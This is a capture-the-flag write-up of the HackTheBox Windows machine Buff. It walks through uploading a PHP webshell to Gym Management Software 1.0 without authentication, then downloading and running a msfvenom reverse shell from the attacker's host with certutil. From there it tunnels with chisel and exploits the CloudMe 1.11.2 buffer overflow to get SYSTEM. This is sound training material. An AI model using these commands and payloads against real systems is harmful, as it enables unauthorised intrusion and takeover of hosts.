Post

Buff

Gym Management Software 1.0 on port 8080 accepted unauthenticated PHP file uploads disguised as images, giving remote code execution as buff\shaun and the user flag.

Buff

Overview

Buff is an easy-difficulty Windows box running a vulnerable PHP gym management application on port 8080. Uploading a PHP webshell disguised as a PNG image through an unauthenticated endpoint (EDB-48506) yields a shell as buff\shaun and the user flag. Privilege escalation targets CloudMe Sync 1.11.2 listening exclusively on localhost port 8888 — chisel tunnels the port to Kali, and a stack buffer overflow (CVE-2018-6892) in the application delivers a SYSTEM shell.

Machine Matrix

Enumeration Real-Life CVE Custom Exploitation CTF-like

Real-Life and CVE dominate: unauthenticated file upload to RCE is a genuine production risk, and the privesc path is a named, weaponized stack overflow against an unpatched desktop application.

Recon

PortServiceNotes
7680WUDOWindows Update Delivery Optimization — not useful
8080HTTPGym Management Software 1.0 (PHP/Apache)
1
2
nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.X
nmap -p7680,8080 -sC -sV -Pn 10.10.10.X

Only port 8080 is interesting — it serves a PHP gym management application that immediately fingerprints itself as “Gym Management Software 1.0” in the page footer, which maps directly to EDB-48506.

Enumeration

Browsing to port 8080 reveals the application name and version in the page source. A quick search for “Gym Management Software 1.0 exploit” surfaces EDB-48506: an unauthenticated unrestricted file upload vulnerability where the upload endpoint at /upload.php accepts any file so long as the client-supplied MIME type is image/png. The saved filename is controlled by the id GET parameter, so sending ?id=shell with a file named shell.php.png causes the server to store the payload as upload/shell.php.

1
curl -s http://10.10.10.X:8080/ | grep -i "gym\|version\|software"

No authentication is required to reach /upload.phpCWE-306 — making this a direct path to unauthenticated RCE.

Foothold

Write the PHP webshell payload disguised as a PNG:

1
echo '<?php echo shell_exec($_GET["cmd"]); ?>' > /tmp/shell.php.png

Upload the webshell through the unauthenticated endpoint:

1
2
3
curl -s -X POST "http://10.10.10.X:8080/upload.php?id=shell" \
  -F "file=@/tmp/shell.php.png;type=image/png" \
  -F "pupload=upload"

Verify RCE via the stored webshell:

1
curl -sG "http://10.10.10.X:8080/upload/shell.php" --data-urlencode "cmd=whoami"

Expected output: buff\shaun. Now upgrade to a stable reverse shell — generate a Windows reverse shell binary:

1
msfvenom -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=4444 -f exe -o /tmp/shell.exe

Serve the binary from Kali:

1
python3 -m http.server 80

Start a listener on Kali:

1
nc -lvnp 4444

Download and execute the reverse shell via the webshell:

1
2
curl -sG "http://10.10.10.X:8080/upload/shell.php" \
  --data-urlencode "cmd=certutil -urlcache -split -f http://<lhost>/shell.exe C:\\Users\\Public\\shell.exe && C:\\Users\\Public\\shell.exe"

A shell as buff\shaun connects back to the listener.

User flag

1
type C:\Users\shaun\Desktop\user.txt   # HTB{...}

Landed directly as buff\shaun — no lateral movement required — and the user flag is ours.

Privilege Escalation

Enumerate localhost-bound services from the shaun shell:

1
netstat -ano | findstr "LISTENING"

Port 8888 is bound to 127.0.0.1 only. Confirm the application:

1
dir "C:\Users\shaun\Downloads\CloudMe_1112.exe"

CloudMe Sync 1.11.2 is installed and running. This version is vulnerable to CVE-2018-6892, a stack buffer overflow caused by copying incoming socket data into a fixed 1052-byte stack buffer without bounds checking. Because CloudMe only listens on localhost, we tunnel the port to Kali using chisel.

Serve chisel from Kali:

1
python3 -m http.server 80

Download chisel onto the target:

1
certutil -urlcache -split -f http://<lhost>/chisel.exe C:\Users\Public\chisel.exe

Start the chisel reverse server on Kali:

1
chisel server -p 9998 --reverse

Connect from the target — forwards target’s 127.0.0.1:8888 to Kali’s 127.0.0.1:8888:

1
C:\Users\Public\chisel.exe client <lhost>:9998 R:8888:127.0.0.1:8888

Generate shellcode for the exploit (bad chars \x00\x0A\x0D excluded):

1
2
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=<lhost> LPORT=9001 EXITFUNC=thread \
  -b "\x00\x0A\x0D" -f python -v payload -o /tmp/cloudme_payload.py

Build the exploit script incorporating the generated payload. The structure is: 1052 bytes of padding, then the EIP overwrite with a PUSH ESP / RET gadget (\xB5\x42\xA8\x68), a NOP sled, and the shellcode — delivered over the tunneled port.

Start the listener on Kali:

1
nc -lvnp 9001

Fire the exploit against the tunneled CloudMe instance:

1
python3 /tmp/cloudme_root.py

A SYSTEM shell connects back.

Root flag

1
type C:\Users\Administrator\Desktop\root.txt   # HTB{...}

Full SYSTEM access achieved via CVE-2018-6892 — Buff is fully compromised.

This post is licensed under CC BY 4.0 by the author.